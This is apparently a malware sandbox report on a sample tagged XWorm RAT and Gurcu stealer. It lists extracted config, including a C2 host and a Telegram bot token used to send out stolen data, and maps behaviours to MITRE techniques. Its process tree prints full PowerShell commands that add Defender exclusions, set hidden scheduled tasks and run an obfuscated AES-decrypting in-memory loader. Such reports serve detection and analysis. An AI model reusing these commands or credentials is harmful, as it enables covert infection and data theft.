gurcu | fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7

Analysis

max time kernel
143s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
07-08-2024 14:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe
Size

19.2MB
MD5

aa4bb4c57074e543076b145b7399cd64
SHA1

5e36e64cc686fa553b43d1c274d1a15e18b50501
SHA256

fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7
SHA512

ff38fc85d51fda9d32668949d2f67074be1e52cb6d63978155347173452199687935b9e96d3a060c7ab74461c5f4228b2c4cf8a0486ca5bbd9ea962a1c16c5eb
SSDEEP

393216:0W7LVQgX47mXZGbWVQjFLICQA122lrL8jiQIthY4eqfIgUJzM8/bX9Wwy:NBfXZGbBjFLICB1hUji1tWbZT9W/

Score

10^/10

gurcu xworm evasion execution persistence rat stealer trojan

Malware Config

Extracted

Family

xworm

floor-talked.gl.at.ply.gg:52348

Attributes

Install_directory
%AppData%
install_file
processor.exe
telegram
https://api.telegram.org/bot6944368626:AAEvUk2RtxxeA2BAieiHfX1ijoOaWr__RyY/sendMessage?chat_id=6270056635

Extracted

Family

gurcu

https://api.telegram.org/bot6944368626:AAEvUk2RtxxeA2BAieiHfX1ijoOaWr__RyY/sendMessage?chat_id=6270056635

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/2956-223-0x00000198D7B30000-0x00000198D7B46000-memory.dmp	family_xworm

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 13 IoCs

flow	pid	Process
14	4296	powershell.exe
16	2956	powershell.exe
33	2956	powershell.exe
34	4296	powershell.exe
35	4296	powershell.exe
40	2956	powershell.exe
41	4296	powershell.exe
42	2956	powershell.exe
48	4296	powershell.exe
49	2956	powershell.exe
50	4296	powershell.exe
51	2956	powershell.exe
52	4296	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4116	powershell.exe
2564	powershell.exe
4744	powershell.exe
1340	powershell.exe
2652	powershell.exe
3976	powershell.exe
2476	powershell.exe
5088	powershell.exe
228	powershell.exe
3548	powershell.exe
4844	powershell.exe
2956	powershell.exe
1800	powershell.exe
456	powershell.exe
2744	powershell.exe
4296	powershell.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
4084	attrib.exe
4992	attrib.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	S500RAT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\processor.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\processor.lnk	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
4300	S500RAT.exe
3172	S500RAT.exe
1548	system.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\system\\system.exe\""	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4752	timeout.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2956	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4116	powershell.exe
4116	powershell.exe
2564	powershell.exe
2564	powershell.exe
2652	powershell.exe
4744	powershell.exe
2652	powershell.exe
4744	powershell.exe
3976	powershell.exe
3976	powershell.exe
1340	powershell.exe
1340	powershell.exe
2476	powershell.exe
5088	powershell.exe
5088	powershell.exe
2476	powershell.exe
2476	powershell.exe
5088	powershell.exe
228	powershell.exe
228	powershell.exe
228	powershell.exe
1800	powershell.exe
1800	powershell.exe
1800	powershell.exe
456	powershell.exe
456	powershell.exe
456	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
4844	powershell.exe
4844	powershell.exe
4844	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
2956	powershell.exe
2956	powershell.exe
2956	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
2744	powershell.exe
2744	powershell.exe
2744	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4116	powershell.exe
Token: SeDebugPrivilege	2564	powershell.exe
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeDebugPrivilege	4744	powershell.exe
Token: SeDebugPrivilege	3976	powershell.exe
Token: SeDebugPrivilege	1340	powershell.exe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeDebugPrivilege	5088	powershell.exe
Token: SeIncreaseQuotaPrivilege	2476	powershell.exe
Token: SeSecurityPrivilege	2476	powershell.exe
Token: SeTakeOwnershipPrivilege	2476	powershell.exe
Token: SeLoadDriverPrivilege	2476	powershell.exe
Token: SeSystemProfilePrivilege	2476	powershell.exe
Token: SeSystemtimePrivilege	2476	powershell.exe
Token: SeProfSingleProcessPrivilege	2476	powershell.exe
Token: SeIncBasePriorityPrivilege	2476	powershell.exe
Token: SeCreatePagefilePrivilege	2476	powershell.exe
Token: SeBackupPrivilege	2476	powershell.exe
Token: SeRestorePrivilege	2476	powershell.exe
Token: SeShutdownPrivilege	2476	powershell.exe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeSystemEnvironmentPrivilege	2476	powershell.exe
Token: SeRemoteShutdownPrivilege	2476	powershell.exe
Token: SeUndockPrivilege	2476	powershell.exe
Token: SeManageVolumePrivilege	2476	powershell.exe
Token: 33	2476	powershell.exe
Token: 34	2476	powershell.exe
Token: 35	2476	powershell.exe
Token: 36	2476	powershell.exe
Token: SeIncreaseQuotaPrivilege	5088	powershell.exe
Token: SeSecurityPrivilege	5088	powershell.exe
Token: SeTakeOwnershipPrivilege	5088	powershell.exe
Token: SeLoadDriverPrivilege	5088	powershell.exe
Token: SeSystemProfilePrivilege	5088	powershell.exe
Token: SeSystemtimePrivilege	5088	powershell.exe
Token: SeProfSingleProcessPrivilege	5088	powershell.exe
Token: SeIncBasePriorityPrivilege	5088	powershell.exe
Token: SeCreatePagefilePrivilege	5088	powershell.exe
Token: SeBackupPrivilege	5088	powershell.exe
Token: SeRestorePrivilege	5088	powershell.exe
Token: SeShutdownPrivilege	5088	powershell.exe
Token: SeDebugPrivilege	5088	powershell.exe
Token: SeSystemEnvironmentPrivilege	5088	powershell.exe
Token: SeRemoteShutdownPrivilege	5088	powershell.exe
Token: SeUndockPrivilege	5088	powershell.exe
Token: SeManageVolumePrivilege	5088	powershell.exe
Token: 33	5088	powershell.exe
Token: 34	5088	powershell.exe
Token: 35	5088	powershell.exe
Token: 36	5088	powershell.exe
Token: SeIncreaseQuotaPrivilege	5088	powershell.exe
Token: SeSecurityPrivilege	5088	powershell.exe
Token: SeTakeOwnershipPrivilege	5088	powershell.exe
Token: SeLoadDriverPrivilege	5088	powershell.exe
Token: SeSystemProfilePrivilege	5088	powershell.exe
Token: SeSystemtimePrivilege	5088	powershell.exe
Token: SeProfSingleProcessPrivilege	5088	powershell.exe
Token: SeIncBasePriorityPrivilege	5088	powershell.exe
Token: SeCreatePagefilePrivilege	5088	powershell.exe
Token: SeBackupPrivilege	5088	powershell.exe
Token: SeRestorePrivilege	5088	powershell.exe
Token: SeShutdownPrivilege	5088	powershell.exe
Token: SeDebugPrivilege	5088	powershell.exe
Token: SeSystemEnvironmentPrivilege	5088	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2956	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3380 wrote to memory of 4300	3380	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe	86
PID 3380 wrote to memory of 4300	3380	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe	86
PID 3380 wrote to memory of 4116	3380	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe	87
PID 3380 wrote to memory of 4116	3380	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe	87
PID 3380 wrote to memory of 1028	3380	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe	89
PID 3380 wrote to memory of 1028	3380	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe	89
PID 3380 wrote to memory of 2564	3380	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe	91
PID 3380 wrote to memory of 2564	3380	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe	91
PID 4300 wrote to memory of 3172	4300	S500RAT.exe	93
PID 4300 wrote to memory of 3172	4300	S500RAT.exe	93
PID 4300 wrote to memory of 4744	4300	S500RAT.exe	94
PID 4300 wrote to memory of 4744	4300	S500RAT.exe	94
PID 1028 wrote to memory of 2652	1028	cmd.exe	96
PID 1028 wrote to memory of 2652	1028	cmd.exe	96
PID 3380 wrote to memory of 4552	3380	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe	97
PID 3380 wrote to memory of 4552	3380	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe	97
PID 4552 wrote to memory of 3976	4552	cmd.exe	99
PID 4552 wrote to memory of 3976	4552	cmd.exe	99
PID 4300 wrote to memory of 2124	4300	S500RAT.exe	100
PID 4300 wrote to memory of 2124	4300	S500RAT.exe	100
PID 4300 wrote to memory of 1340	4300	S500RAT.exe	102
PID 4300 wrote to memory of 1340	4300	S500RAT.exe	102
PID 4300 wrote to memory of 4788	4300	S500RAT.exe	105
PID 4300 wrote to memory of 4788	4300	S500RAT.exe	105
PID 3976 wrote to memory of 2476	3976	powershell.exe	107
PID 3976 wrote to memory of 2476	3976	powershell.exe	107
PID 2652 wrote to memory of 5088	2652	powershell.exe	109
PID 2652 wrote to memory of 5088	2652	powershell.exe	109
PID 3976 wrote to memory of 3028	3976	powershell.exe	111
PID 3976 wrote to memory of 3028	3976	powershell.exe	111
PID 2652 wrote to memory of 800	2652	powershell.exe	112
PID 2652 wrote to memory of 800	2652	powershell.exe	112
PID 800 wrote to memory of 976	800	WScript.exe	113
PID 800 wrote to memory of 976	800	WScript.exe	113
PID 3028 wrote to memory of 4864	3028	WScript.exe	114
PID 3028 wrote to memory of 4864	3028	WScript.exe	114
PID 2124 wrote to memory of 228	2124	cmd.exe	117
PID 2124 wrote to memory of 228	2124	cmd.exe	117
PID 228 wrote to memory of 1800	228	powershell.exe	118
PID 228 wrote to memory of 1800	228	powershell.exe	118
PID 228 wrote to memory of 956	228	powershell.exe	120
PID 228 wrote to memory of 956	228	powershell.exe	120
PID 956 wrote to memory of 4952	956	WScript.exe	121
PID 956 wrote to memory of 4952	956	WScript.exe	121
PID 4788 wrote to memory of 456	4788	cmd.exe	123
PID 4788 wrote to memory of 456	4788	cmd.exe	123
PID 4864 wrote to memory of 3548	4864	cmd.exe	124
PID 4864 wrote to memory of 3548	4864	cmd.exe	124
PID 456 wrote to memory of 4844	456	powershell.exe	125
PID 456 wrote to memory of 4844	456	powershell.exe	125
PID 976 wrote to memory of 2956	976	cmd.exe	127
PID 976 wrote to memory of 2956	976	cmd.exe	127
PID 456 wrote to memory of 2984	456	powershell.exe	128
PID 456 wrote to memory of 2984	456	powershell.exe	128
PID 2984 wrote to memory of 1488	2984	WScript.exe	129
PID 2984 wrote to memory of 1488	2984	WScript.exe	129
PID 3548 wrote to memory of 4084	3548	powershell.exe	131
PID 3548 wrote to memory of 4084	3548	powershell.exe	131
PID 3548 wrote to memory of 4992	3548	powershell.exe	133
PID 3548 wrote to memory of 4992	3548	powershell.exe	133
PID 4952 wrote to memory of 2744	4952	cmd.exe	135
PID 4952 wrote to memory of 2744	4952	cmd.exe	135
PID 1488 wrote to memory of 4296	1488	cmd.exe	136
PID 1488 wrote to memory of 4296	1488	cmd.exe	136

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4992	attrib.exe
4084	attrib.exe

C:\Users\Admin\AppData\Local\Temp\fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe
"C:\Users\Admin\AppData\Local\Temp\fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3380
- C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
  "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4300
- - C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
    "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
    3⤵
    - Executes dropped EXE
    PID:3172
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\invoicer.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2124
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      4⤵
      Command and Scripting Interpreter: PowerShell
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:228
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_166_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_166.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1800
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_166.vbs"
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:956
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_166.bat" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Roaming\startup_str_166.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2744
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4788
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      4⤵
      Command and Scripting Interpreter: PowerShell
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:456
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_58_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_58.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4844
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_58.vbs"
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:2984
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_58.bat" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Roaming\startup_str_58.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\invoicer.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1028
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
